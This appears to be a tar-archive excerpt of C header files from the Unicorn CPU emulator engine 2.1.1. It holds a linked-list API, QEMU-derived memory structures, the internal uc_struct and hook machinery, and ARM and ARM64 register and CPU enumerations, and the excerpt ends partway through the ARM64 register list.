�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014627�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/list.h������������������������������������������������������������������������0000664�0000000�0000000�00000001446�14675241067�0015760�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef UC_LLIST_H #define UC_LLIST_H #include "unicorn/platform.h" typedef void (*delete_fn)(void *data); struct list_item { struct list_item *next; void *data; }; struct list { struct list_item *head, *tail; delete_fn delete_fn; }; // create a new list struct list *list_new(void); // removed linked list nodes but does not free their content void list_clear(struct list *list); // insert a new item at the begin of the list. void *list_insert(struct list *list, void *data); // append a new item at the end of the list. void *list_append(struct list *list, void *data); // returns true if entry was removed, false otherwise bool list_remove(struct list *list, void *data); // returns true if the data exists in the list bool list_exists(struct list *list, void *data); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/qemu.h������������������������������������������������������������������������0000664�0000000�0000000�00000002076�14675241067�0015754�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* By Dang Hoang Vu <dang.hvu -at- gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_QEMU_H #define UC_QEMU_H struct uc_struct; #define OPC_BUF_SIZE 640 #include "sysemu/sysemu.h" #include "sysemu/cpus.h" #include "exec/cpu-common.h" #include "exec/memory.h" #include "qemu/thread.h" #include "hw/core/cpu.h" #include "vl.h" // This struct is originally from qemu/include/exec/ramblock.h // Temporarily moved here since there is circular inclusion. struct RAMBlock { struct MemoryRegion *mr; uint8_t *host; ram_addr_t offset; ram_addr_t used_length; ram_addr_t max_length; uint32_t flags; /* RCU-enabled, writes protected by the ramlist lock */ QLIST_ENTRY(RAMBlock) next; size_t page_size; }; typedef struct { MemoryRegion *mr; void *buffer; hwaddr addr; hwaddr len; } BounceBuffer; // This struct is originally from qemu/include/exec/ramlist.h typedef struct RAMList { bool freed; RAMBlock *mru_block; QLIST_HEAD(, RAMBlock) blocks; } RAMList; #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/uc_priv.h���������������������������������������������������������������������0000664�0000000�0000000�00000046704�14675241067�0016462�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_PRIV_H #define UC_PRIV_H #include "unicorn/platform.h" #include <stdio.h> #include "qemu.h" #include "qemu/xxhash.h" #include "unicorn/unicorn.h" #include "list.h" // The max recursive nested uc_emu_start levels #define UC_MAX_NESTED_LEVEL (64) // These are masks of supported modes for each cpu/arch. // They should be updated when changes are made to the uc_mode enum typedef. #define UC_MODE_ARM_MASK \ (UC_MODE_ARM | UC_MODE_THUMB | UC_MODE_LITTLE_ENDIAN | UC_MODE_MCLASS | \ UC_MODE_ARM926 | UC_MODE_ARM946 | UC_MODE_ARM1176 | UC_MODE_BIG_ENDIAN | \ UC_MODE_ARMBE8) #define UC_MODE_MIPS_MASK \ (UC_MODE_MIPS32 | UC_MODE_MIPS64 | UC_MODE_LITTLE_ENDIAN | \ UC_MODE_BIG_ENDIAN) #define UC_MODE_X86_MASK \ (UC_MODE_16 | UC_MODE_32 | UC_MODE_64 | UC_MODE_LITTLE_ENDIAN) #define UC_MODE_PPC_MASK (UC_MODE_PPC32 | UC_MODE_PPC64 | UC_MODE_BIG_ENDIAN) #define UC_MODE_SPARC_MASK \ (UC_MODE_SPARC32 | UC_MODE_SPARC64 | UC_MODE_BIG_ENDIAN) #define UC_MODE_M68K_MASK (UC_MODE_BIG_ENDIAN) #define UC_MODE_RISCV_MASK \ (UC_MODE_RISCV32 | UC_MODE_RISCV64 | UC_MODE_LITTLE_ENDIAN) #define UC_MODE_S390X_MASK (UC_MODE_BIG_ENDIAN) #define UC_MODE_TRICORE_MASK (UC_MODE_LITTLE_ENDIAN) #define ARR_SIZE(a) (sizeof(a) / sizeof(a[0])) #define READ_QWORD(x) ((uint64_t)x) #define READ_DWORD(x) (x & 0xffffffff) #define READ_WORD(x) (x & 0xffff) #define READ_BYTE_H(x) ((x & 0xffff) >> 8) #define READ_BYTE_L(x) (x & 0xff) #define WRITE_DWORD(x, w) (x = (x & ~0xffffffffLL) | (w & 0xffffffff)) #define WRITE_WORD(x, w) (x = (x & ~0xffff) | (w & 0xffff)) #define WRITE_BYTE_H(x, b) (x = (x & ~0xff00) | ((b & 0xff) << 8)) #define WRITE_BYTE_L(x, b) (x = (x & ~0xff) | (b & 0xff)) struct TranslationBlock; // Place the struct here since we need it in uc.c typedef struct _mmio_cbs { uc_cb_mmio_read_t read; void *user_data_read; uc_cb_mmio_write_t write; void *user_data_write; MemoryRegionOps ops; } mmio_cbs; typedef uc_err (*query_t)(struct uc_struct *uc, uc_query_type type, size_t *result); typedef uc_err (*reg_read_t)(void *env, int mode, unsigned int regid, void *value, size_t *size); typedef uc_err (*reg_write_t)(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); typedef struct { reg_read_t read; reg_write_t write; } context_reg_rw_t; typedef void (*reg_reset_t)(struct uc_struct *uc); typedef bool (*uc_write_mem_t)(AddressSpace *as, hwaddr addr, const uint8_t *buf, int len); typedef bool (*uc_read_mem_t)(AddressSpace *as, hwaddr addr, uint8_t *buf, int len); typedef MemoryRegion *(*uc_mem_cow_t)(struct uc_struct *uc, MemoryRegion *current, hwaddr begin, size_t size); typedef void (*uc_args_void_t)(void *); typedef void (*uc_args_uc_t)(struct uc_struct *); typedef void (*uc_args_int_uc_t)(struct uc_struct *); typedef void (*uc_args_uc_long_t)(struct uc_struct *, uint32_t); typedef void (*uc_args_uc_u64_t)(struct uc_struct *, uint64_t addr); typedef uint64_t (*uc_get_pc_t)(struct uc_struct *); typedef MemoryRegion *(*uc_args_uc_ram_size_t)(struct uc_struct *, hwaddr begin, size_t size, uint32_t perms); typedef MemoryRegion *(*uc_args_uc_ram_size_ptr_t)(struct uc_struct *, hwaddr begin, size_t size, uint32_t perms, void *ptr); typedef void (*uc_mem_unmap_t)(struct uc_struct *, MemoryRegion *mr); typedef MemoryRegion *(*uc_memory_mapping_t)(struct uc_struct *, hwaddr addr); typedef void (*uc_memory_filter_t)(MemoryRegion *, int32_t); typedef void (*uc_readonly_mem_t)(MemoryRegion *mr, bool readonly); typedef int (*uc_cpus_init)(struct uc_struct *, const char *); typedef MemoryRegion *(*uc_memory_map_io_t)(struct uc_struct *uc, ram_addr_t begin, size_t size, uc_cb_mmio_read_t read_cb, uc_cb_mmio_write_t write_cb, void *user_data_read, void *user_data_write); // which interrupt should make emulation stop? typedef bool (*uc_args_int_t)(struct uc_struct *uc, int intno); // validate if Unicorn supports hooking a given instruction typedef bool (*uc_insn_hook_validate)(uint32_t insn_enum); typedef bool (*uc_opcode_hook_validate_t)(uint32_t op, uint32_t flags); // init target page typedef void (*uc_target_page_init)(struct uc_struct *); // soft float init typedef void (*uc_softfloat_initialize)(void); // tcg flush softmmu tlb typedef void (*uc_tcg_flush_tlb)(struct uc_struct *uc); // Invalidate the TB at given address typedef void (*uc_invalidate_tb_t)(struct uc_struct *uc, uint64_t start, size_t len); // Request generating TB at given address typedef uc_err (*uc_gen_tb_t)(struct uc_struct *uc, uint64_t pc, uc_tb *out_tb); // tb flush typedef uc_tcg_flush_tlb uc_tb_flush_t; typedef uc_err (*uc_set_tlb_t)(struct uc_struct *uc, int mode); struct hook { int type; // UC_HOOK_* int insn; // instruction for HOOK_INSN int refs; // reference count to free hook stored in multiple lists int op; // opcode for HOOK_TCG_OPCODE int op_flags; // opcode flags for HOOK_TCG_OPCODE bool to_delete; // set to true when the hook is deleted by the user. The // destruction of the hook is delayed. uint64_t begin, end; // only trigger if PC or memory access is in this // address (depends on hook type) void *callback; // a uc_cb_* type void *user_data; GHashTable *hooked_regions; // The regions this hook instrumented on }; // Add an inline hook to helper_table typedef void (*uc_add_inline_hook_t)(struct uc_struct *uc, struct hook *hk, void **args, int args_len); // Delete a hook from helper_table typedef void (*uc_del_inline_hook_t)(struct uc_struct *uc, struct hook *hk); // Return the size of a CPU context typedef size_t (*uc_context_size_t)(struct uc_struct *uc); // Generate a CPU context typedef uc_err (*uc_context_save_t)(struct uc_struct *uc, uc_context *context); // Restore a CPU context typedef uc_err (*uc_context_restore_t)(struct uc_struct *uc, uc_context *context); // hook list offsets // // The lowest 6 bits are used for hook type index while the others // are used for hook flags. // // mirrors the order of uc_hook_type from include/unicorn/unicorn.h typedef enum uc_hook_idx { UC_HOOK_INTR_IDX, UC_HOOK_INSN_IDX, UC_HOOK_CODE_IDX, UC_HOOK_BLOCK_IDX, UC_HOOK_MEM_READ_UNMAPPED_IDX, UC_HOOK_MEM_WRITE_UNMAPPED_IDX, UC_HOOK_MEM_FETCH_UNMAPPED_IDX, UC_HOOK_MEM_READ_PROT_IDX, UC_HOOK_MEM_WRITE_PROT_IDX, UC_HOOK_MEM_FETCH_PROT_IDX, UC_HOOK_MEM_READ_IDX, UC_HOOK_MEM_WRITE_IDX, UC_HOOK_MEM_FETCH_IDX, UC_HOOK_MEM_READ_AFTER_IDX, UC_HOOK_INSN_INVALID_IDX, UC_HOOK_EDGE_GENERATED_IDX, UC_HOOK_TCG_OPCODE_IDX, UC_HOOK_TLB_FILL_IDX, UC_HOOK_MAX, } uc_hook_idx; // Copy the essential information from TranslationBlock #define UC_TB_COPY(uc_tb, tb) \ do { \ (uc_tb)->pc = tb->pc; \ (uc_tb)->icount = tb->icount; \ (uc_tb)->size = tb->size; \ } while (0) // The lowest 6 bits are used for hook type index. #define UC_HOOK_IDX_MASK ((1 << 6) - 1) // hook flags #define UC_HOOK_FLAG_NO_STOP \ (1 << 6) // Don't stop emulation in this uc_tracecode. // The rest of bits are reserved for hook flags. #define UC_HOOK_FLAG_MASK (~(UC_HOOK_IDX_MASK)) #define HOOK_FOREACH_VAR_DECLARE struct list_item *cur // for loop macro to loop over hook lists #define HOOK_FOREACH(uc, hh, idx) \ for (cur = (uc)->hook[idx##_IDX].head; \ cur != NULL && ((hh) = (struct hook *)cur->data); cur = cur->next) // if statement to check hook bounds #define HOOK_BOUND_CHECK(hh, addr) \ ((((addr) >= (hh)->begin && (addr) <= (hh)->end) || \ (hh)->begin > (hh)->end) && \ !((hh)->to_delete)) #define HOOK_EXISTS(uc, idx) ((uc)->hook[idx##_IDX].head != NULL) #define HOOK_EXISTS_BOUNDED(uc, idx, addr) \ _hook_exists_bounded((uc)->hook[idx##_IDX].head, addr) static inline bool _hook_exists_bounded(struct list_item *cur, uint64_t addr) { while (cur != NULL) { if (HOOK_BOUND_CHECK((struct hook *)cur->data, addr)) return true; cur = cur->next; } return false; } // relloc increment, KEEP THIS A POWER OF 2! #define MEM_BLOCK_INCR 32 typedef struct TargetPageBits TargetPageBits; typedef struct TCGContext TCGContext; struct uc_struct { uc_arch arch; uc_mode mode; uc_err errnum; // qemu/cpu-exec.c AddressSpace address_space_memory; AddressSpace address_space_io; query_t query; reg_read_t reg_read; reg_write_t reg_write; reg_reset_t reg_reset; uc_write_mem_t write_mem; uc_read_mem_t read_mem; uc_mem_cow_t memory_cow; uc_args_void_t release; // release resource when uc_close() uc_args_uc_u64_t set_pc; // set PC for tracecode uc_get_pc_t get_pc; uc_args_int_t stop_interrupt; // check if the interrupt should stop emulation uc_memory_map_io_t memory_map_io; uc_args_uc_t init_arch, cpu_exec_init_all; uc_args_int_uc_t vm_start; uc_args_uc_long_t tcg_exec_init; uc_args_uc_ram_size_t memory_map; uc_args_uc_ram_size_ptr_t memory_map_ptr; uc_memory_mapping_t memory_mapping; uc_memory_filter_t memory_filter_subregions; uc_mem_unmap_t memory_unmap; uc_mem_unmap_t memory_moveout; uc_mem_unmap_t memory_movein; uc_readonly_mem_t readonly_mem; uc_cpus_init cpus_init; uc_target_page_init target_page; uc_softfloat_initialize softfloat_initialize; uc_tcg_flush_tlb tcg_flush_tlb; uc_invalidate_tb_t uc_invalidate_tb; uc_gen_tb_t uc_gen_tb; uc_tb_flush_t tb_flush; uc_add_inline_hook_t add_inline_hook; uc_del_inline_hook_t del_inline_hook; uc_context_size_t context_size; uc_context_save_t context_save; uc_context_restore_t context_restore; /* only 1 cpu in unicorn, do not need current_cpu to handle current running cpu. */ CPUState *cpu; uc_insn_hook_validate insn_hook_validate; uc_opcode_hook_validate_t opcode_hook_invalidate; MemoryRegion *system_memory; // qemu/exec.c MemoryRegion *system_io; // qemu/exec.c MemoryRegion io_mem_unassigned; // qemu/exec.c RAMList ram_list; // qemu/exec.c /* qemu/exec.c */ unsigned int alloc_hint; /* qemu/exec-vary.c */ TargetPageBits *init_target_page; int target_bits; // User defined page bits by uc_ctl int cpu_model; BounceBuffer bounce; // qemu/cpu-exec.c volatile sig_atomic_t exit_request; // qemu/cpu-exec.c /* qemu/accel/tcg/cpu-exec-common.c */ /* always be true after call tcg_exec_init(). */ bool tcg_allowed; /* This is a multi-level map on the virtual address space. The bottom level has pointers to PageDesc. */ void **l1_map; // qemu/accel/tcg/translate-all.c size_t l1_map_size; /* qemu/accel/tcg/translate-all.c */ int v_l1_size; int v_l1_shift; int v_l2_levels; /* code generation context */ TCGContext *tcg_ctx; /* memory.c */ QTAILQ_HEAD(memory_listeners, MemoryListener) memory_listeners; QTAILQ_HEAD(, AddressSpace) address_spaces; GHashTable *flat_views; bool memory_region_update_pending; uc_set_tlb_t set_tlb; // linked lists containing hooks per type struct list hook[UC_HOOK_MAX]; struct list hooks_to_del; int hooks_count[UC_HOOK_MAX]; // hook to count number of instructions for uc_emu_start() uc_hook count_hook; size_t emu_counter; // current counter of uc_emu_start() size_t emu_count; // save counter of uc_emu_start() int size_recur_mem; // size for mem access when in a recursive call bool init_tcg; // already initialized local TCGv variables? bool stop_request; // request to immediately stop emulation - for // uc_emu_stop() bool quit_request; // request to quit the current TB, but continue to // emulate - for uc_mem_protect() bool emulation_done; // emulation is done by uc_emu_start() bool timed_out; // emulation timed out, that can retrieve via // uc_query(UC_QUERY_TIMEOUT) QemuThread timer; // timer for emulation timeout uint64_t timeout; // timeout for uc_emu_start() uint64_t invalid_addr; // invalid address to be accessed int invalid_error; // invalid memory code: 1 = READ, 2 = WRITE, 3 = CODE int use_exits; uint64_t exits[UC_MAX_NESTED_LEVEL]; // When multiple exits is not enabled. GTree *ctl_exits; // addresses where emulation stops (@until param of // uc_emu_start()) Also see UC_CTL_USE_EXITS for more // details. int thumb; // thumb mode for ARM MemoryRegion **mapped_blocks; uint32_t mapped_block_count; uint32_t mapped_block_cache_index; void *qemu_thread_data; // to support cross compile to Windows // (qemu-thread-win32.c) uint32_t target_page_size; uint32_t target_page_align; uint64_t qemu_host_page_size; uint64_t qemu_real_host_page_size; int qemu_icache_linesize; /* ARCH_REGS_STORAGE_SIZE */ uc_context_content context_content; int cpu_context_size; uint64_t next_pc; // save next PC for some special cases bool hook_insert; // insert new hook at begin of the hook list (append by // default) bool first_tb; // is this the first Translation-Block ever generated since // uc_emu_start()? bool no_exit_request; // Disable check_exit_request temporarily. A // workaround to treat the IT block as a whole block. bool init_done; // Whether the initialization is done. sigjmp_buf jmp_bufs[UC_MAX_NESTED_LEVEL]; // To support nested uc_emu_start int nested_level; // Current nested_level struct TranslationBlock *last_tb; // The real last tb we executed. FlatView *empty_view; // Static function variable moved from flatviews_init uint32_t tcg_buffer_size; // The buffer size we are going to use #ifdef WIN32 PVOID seh_handle; void *seh_closure; #endif GArray *unmapped_regions; int32_t snapshot_level; uint64_t nested; // the nested level of all exposed API bool thread_executable_entry; bool current_executable; }; // Metadata stub for the variable-size cpu context used with uc_context_*() struct uc_context { size_t context_size; // size of the real internal context structure uc_mode mode; // the mode of this context uc_arch arch; // the arch of this context int snapshot_level; // the memory snapshot level to restore char data[0]; // context }; // We have to support 32bit system so we can't hold uint64_t on void* static inline void uc_add_exit(uc_engine *uc, uint64_t addr) { uint64_t *new_exit = g_malloc(sizeof(uint64_t)); *new_exit = addr; g_tree_insert(uc->ctl_exits, (gpointer)new_exit, (gpointer)1); } // This function has to exist since we would like to accept uint32_t or // it's complex to achieve so. static inline int uc_addr_is_exit(uc_engine *uc, uint64_t addr) { if (uc->use_exits) { return g_tree_lookup(uc->ctl_exits, (gpointer)(&addr)) == (gpointer)1; } else { return uc->exits[uc->nested_level - 1] == addr; } } typedef struct HookedRegion { uint64_t start; uint64_t length; } HookedRegion; // hooked_regions related functions static inline guint hooked_regions_hash(const void *p) { HookedRegion *region = (HookedRegion *)p; return qemu_xxhash4(region->start, region->length); } static inline gboolean hooked_regions_equal(const void *lhs, const void *rhs) { HookedRegion *l = (HookedRegion *)lhs; HookedRegion *r = (HookedRegion *)rhs; return l->start == r->start && l->length == r->length; } static inline void hooked_regions_add(struct hook *h, uint64_t start, uint64_t length) { HookedRegion tmp; tmp.start = start; tmp.length = length; if (!g_hash_table_lookup(h->hooked_regions, (void *)&tmp)) { HookedRegion *r = malloc(sizeof(HookedRegion)); r->start = start; r->length = length; g_hash_table_insert(h->hooked_regions, (void *)r, (void *)1); } } static inline void hooked_regions_check_single(struct list_item *cur, uint64_t start, uint64_t length) { while (cur != NULL) { if (HOOK_BOUND_CHECK((struct hook *)cur->data, start)) { hooked_regions_add((struct hook *)cur->data, start, length); } cur = cur->next; } } static inline void hooked_regions_check(uc_engine *uc, uint64_t start, uint64_t length) { // Only UC_HOOK_BLOCK and UC_HOOK_CODE might be wrongle cached! hooked_regions_check_single(uc->hook[UC_HOOK_CODE_IDX].head, start, length); hooked_regions_check_single(uc->hook[UC_HOOK_BLOCK_IDX].head, start, length); } /* break translation loop: This is done in two cases: 1. the user wants to stop the emulation. 2. the user has set it IP. This requires to restart the internal CPU emulation and rebuild some translation blocks */ static inline uc_err break_translation_loop(uc_engine *uc) { if (uc->emulation_done) { return UC_ERR_OK; } // TODO: make this atomic somehow? if (uc->cpu) { // exit the current TB cpu_exit(uc->cpu); } return UC_ERR_OK; } #ifdef UNICORN_TRACER #define UC_TRACE_START(loc) trace_start(get_tracer(), loc) #define UC_TRACE_END(loc, fmt, ...) \ trace_end(get_tracer(), loc, fmt, __VA_ARGS__) typedef enum trace_loc { UC_TRACE_TB_EXEC = 0, UC_TRACE_TB_TRANS, UC_TRACER_MAX } trace_loc; typedef struct uc_tracer { int64_t starts[UC_TRACER_MAX]; } uc_tracer; uc_tracer *get_tracer(); void trace_start(uc_tracer *tracer, trace_loc loc); void trace_end(uc_tracer *tracer, trace_loc loc, const char *fmt, ...); #else #define UC_TRACE_START(loc) #define UC_TRACE_END(loc, fmt, ...) #endif #endif /* vim: set ts=4 noet: */ ������������������������������������������������������������unicorn-2.1.1/include/unicorn/����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016304�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/arm.h�����������������������������������������������������������������0000664�0000000�0000000�00000012200�14675241067�0017227�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_ARM_H #define UNICORN_ARM_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> ARM CPU typedef enum uc_cpu_arm { UC_CPU_ARM_926 = 0, UC_CPU_ARM_946, UC_CPU_ARM_1026, UC_CPU_ARM_1136_R2, UC_CPU_ARM_1136, UC_CPU_ARM_1176, UC_CPU_ARM_11MPCORE, UC_CPU_ARM_CORTEX_M0, UC_CPU_ARM_CORTEX_M3, UC_CPU_ARM_CORTEX_M4, UC_CPU_ARM_CORTEX_M7, UC_CPU_ARM_CORTEX_M33, UC_CPU_ARM_CORTEX_R5, UC_CPU_ARM_CORTEX_R5F, UC_CPU_ARM_CORTEX_A7, UC_CPU_ARM_CORTEX_A8, UC_CPU_ARM_CORTEX_A9, UC_CPU_ARM_CORTEX_A15, UC_CPU_ARM_TI925T, UC_CPU_ARM_SA1100, UC_CPU_ARM_SA1110, UC_CPU_ARM_PXA250, UC_CPU_ARM_PXA255, UC_CPU_ARM_PXA260, UC_CPU_ARM_PXA261, UC_CPU_ARM_PXA262, UC_CPU_ARM_PXA270, UC_CPU_ARM_PXA270A0, UC_CPU_ARM_PXA270A1, UC_CPU_ARM_PXA270B0, UC_CPU_ARM_PXA270B1, UC_CPU_ARM_PXA270C0, UC_CPU_ARM_PXA270C5, UC_CPU_ARM_MAX, UC_CPU_ARM_ENDING } uc_cpu_arm; // ARM coprocessor registers, use this with UC_ARM_REG_CP_REG to // in call to uc_reg_write/read() to access the registers. typedef struct uc_arm_cp_reg { uint32_t cp; // The coprocessor identifier uint32_t is64; // Is it a 64 bit control register uint32_t sec; // Security state uint32_t crn; // Coprocessor register number uint32_t crm; // Coprocessor register number uint32_t opc1; // Opcode1 uint32_t opc2; // Opcode2 uint64_t val; // The value to read/write } uc_arm_cp_reg; //> ARM registers typedef enum uc_arm_reg { UC_ARM_REG_INVALID = 0, UC_ARM_REG_APSR, UC_ARM_REG_APSR_NZCV, UC_ARM_REG_CPSR, UC_ARM_REG_FPEXC, UC_ARM_REG_FPINST, UC_ARM_REG_FPSCR, UC_ARM_REG_FPSCR_NZCV, UC_ARM_REG_FPSID, UC_ARM_REG_ITSTATE, UC_ARM_REG_LR, UC_ARM_REG_PC, UC_ARM_REG_SP, UC_ARM_REG_SPSR, UC_ARM_REG_D0, UC_ARM_REG_D1, UC_ARM_REG_D2, UC_ARM_REG_D3, UC_ARM_REG_D4, UC_ARM_REG_D5, UC_ARM_REG_D6, UC_ARM_REG_D7, UC_ARM_REG_D8, UC_ARM_REG_D9, UC_ARM_REG_D10, UC_ARM_REG_D11, UC_ARM_REG_D12, UC_ARM_REG_D13, UC_ARM_REG_D14, UC_ARM_REG_D15, UC_ARM_REG_D16, UC_ARM_REG_D17, UC_ARM_REG_D18, UC_ARM_REG_D19, UC_ARM_REG_D20, UC_ARM_REG_D21, UC_ARM_REG_D22, UC_ARM_REG_D23, UC_ARM_REG_D24, UC_ARM_REG_D25, UC_ARM_REG_D26, UC_ARM_REG_D27, UC_ARM_REG_D28, UC_ARM_REG_D29, UC_ARM_REG_D30, UC_ARM_REG_D31, UC_ARM_REG_FPINST2, UC_ARM_REG_MVFR0, UC_ARM_REG_MVFR1, UC_ARM_REG_MVFR2, UC_ARM_REG_Q0, UC_ARM_REG_Q1, UC_ARM_REG_Q2, UC_ARM_REG_Q3, UC_ARM_REG_Q4, UC_ARM_REG_Q5, UC_ARM_REG_Q6, UC_ARM_REG_Q7, UC_ARM_REG_Q8, UC_ARM_REG_Q9, UC_ARM_REG_Q10, UC_ARM_REG_Q11, UC_ARM_REG_Q12, UC_ARM_REG_Q13, UC_ARM_REG_Q14, UC_ARM_REG_Q15, UC_ARM_REG_R0, UC_ARM_REG_R1, UC_ARM_REG_R2, UC_ARM_REG_R3, UC_ARM_REG_R4, UC_ARM_REG_R5, UC_ARM_REG_R6, UC_ARM_REG_R7, UC_ARM_REG_R8, UC_ARM_REG_R9, UC_ARM_REG_R10, UC_ARM_REG_R11, UC_ARM_REG_R12, UC_ARM_REG_S0, UC_ARM_REG_S1, UC_ARM_REG_S2, UC_ARM_REG_S3, UC_ARM_REG_S4, UC_ARM_REG_S5, UC_ARM_REG_S6, UC_ARM_REG_S7, UC_ARM_REG_S8, UC_ARM_REG_S9, UC_ARM_REG_S10, UC_ARM_REG_S11, UC_ARM_REG_S12, UC_ARM_REG_S13, UC_ARM_REG_S14, UC_ARM_REG_S15, UC_ARM_REG_S16, UC_ARM_REG_S17, UC_ARM_REG_S18, UC_ARM_REG_S19, UC_ARM_REG_S20, UC_ARM_REG_S21, UC_ARM_REG_S22, UC_ARM_REG_S23, UC_ARM_REG_S24, UC_ARM_REG_S25, UC_ARM_REG_S26, UC_ARM_REG_S27, UC_ARM_REG_S28, UC_ARM_REG_S29, UC_ARM_REG_S30, UC_ARM_REG_S31, UC_ARM_REG_C1_C0_2, // Depreciated, use UC_ARM_REG_CP_REG instead UC_ARM_REG_C13_C0_2, // Depreciated, use UC_ARM_REG_CP_REG instead UC_ARM_REG_C13_C0_3, // Depreciated, use UC_ARM_REG_CP_REG instead UC_ARM_REG_IPSR, UC_ARM_REG_MSP, UC_ARM_REG_PSP, UC_ARM_REG_CONTROL, UC_ARM_REG_IAPSR, UC_ARM_REG_EAPSR, UC_ARM_REG_XPSR, UC_ARM_REG_EPSR, UC_ARM_REG_IEPSR, UC_ARM_REG_PRIMASK, UC_ARM_REG_BASEPRI, UC_ARM_REG_BASEPRI_MAX, UC_ARM_REG_FAULTMASK, UC_ARM_REG_APSR_NZCVQ, UC_ARM_REG_APSR_G, UC_ARM_REG_APSR_NZCVQG, UC_ARM_REG_IAPSR_NZCVQ, UC_ARM_REG_IAPSR_G, UC_ARM_REG_IAPSR_NZCVQG, UC_ARM_REG_EAPSR_NZCVQ, UC_ARM_REG_EAPSR_G, UC_ARM_REG_EAPSR_NZCVQG, UC_ARM_REG_XPSR_NZCVQ, UC_ARM_REG_XPSR_G, UC_ARM_REG_XPSR_NZCVQG, UC_ARM_REG_CP_REG, UC_ARM_REG_ENDING, // <-- mark the end of the list or registers //> alias registers UC_ARM_REG_R13 = UC_ARM_REG_SP, UC_ARM_REG_R14 = UC_ARM_REG_LR, UC_ARM_REG_R15 = UC_ARM_REG_PC, UC_ARM_REG_SB = UC_ARM_REG_R9, UC_ARM_REG_SL = UC_ARM_REG_R10, UC_ARM_REG_FP = UC_ARM_REG_R11, UC_ARM_REG_IP = UC_ARM_REG_R12, } uc_arm_reg; #ifdef __cplusplus } #endif #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/arm64.h���������������������������������������������������������������0000664�0000000�0000000�00000021411�14675241067�0017405�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ /* This file is released under LGPL2. See COPYING.LGPL2 in root directory for more details */ #ifndef UNICORN_ARM64_H #define UNICORN_ARM64_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> ARM64 CPU typedef enum uc_cpu_arm64 { UC_CPU_ARM64_A57 = 0, UC_CPU_ARM64_A53, UC_CPU_ARM64_A72, UC_CPU_ARM64_MAX, UC_CPU_ARM64_ENDING } uc_cpu_arm64; // ARM64 coprocessor registers, use this with UC_ARM64_REG_CP_REG to // in call to uc_reg_write/read() to access the registers. typedef struct uc_arm64_cp_reg { uint32_t crn; // Coprocessor register number uint32_t crm; // Coprocessor register number uint32_t op0; // Opcode0 uint32_t op1; // Opcode1 uint32_t op2; // Opcode2 uint64_t val; // The value to read/write } uc_arm64_cp_reg; //> ARM64 registers typedef enum uc_arm64_reg { UC_ARM64_REG_INVALID = 0, UC_ARM64_REG_X29, UC_ARM64_REG_X30, UC_ARM64_REG_NZCV, UC_ARM64_REG_SP, UC_ARM64_REG_WSP, UC_ARM64_REG_WZR, UC_ARM64_REG_XZR, UC_ARM64_REG_B0, UC_ARM64_REG_B1, UC_ARM64_REG_B2, UC_ARM64_REG_B3, UC_ARM64_REG_B4, UC_ARM64_REG_B5, UC_ARM64_REG_B6, UC_ARM64_REG_B7, UC_ARM64_REG_B8, UC_ARM64_REG_B9, UC_ARM64_REG_B10, UC_ARM64_REG_B11, UC_ARM64_REG_B12, UC_ARM64_REG_B13, UC_ARM64_REG_B14, UC_ARM64_REG_B15, UC_ARM64_REG_B16, UC_ARM64_REG_B17, UC_ARM64_REG_B18, UC_ARM64_REG_B19, UC_ARM64_REG_B20, UC_ARM64_REG_B21, UC_ARM64_REG_B22, UC_ARM64_REG_B23, UC_ARM64_REG_B24, UC_ARM64_REG_B25, UC_ARM64_REG_B26, UC_ARM64_REG_B27, UC_ARM64_REG_B28, UC_ARM64_REG_B29, UC_ARM64_REG_B30, UC_ARM64_REG_B31, UC_ARM64_REG_D0, UC_ARM64_REG_D1, UC_ARM64_REG_D2, UC_ARM64_REG_D3, UC_ARM64_REG_D4, UC_ARM64_REG_D5, UC_ARM64_REG_D6, UC_ARM64_REG_D7, UC_ARM64_REG_D8, UC_ARM64_REG_D9, UC_ARM64_REG_D10, UC_ARM64_REG_D11, UC_ARM64_REG_D12, UC_ARM64_REG_D13, UC_ARM64_REG_D14, UC_ARM64_REG_D15, UC_ARM64_REG_D16, UC_ARM64_REG_D17, UC_ARM64_REG_D18, UC_ARM64_REG_D19, UC_ARM64_REG_D20, UC_ARM64_REG_D21, 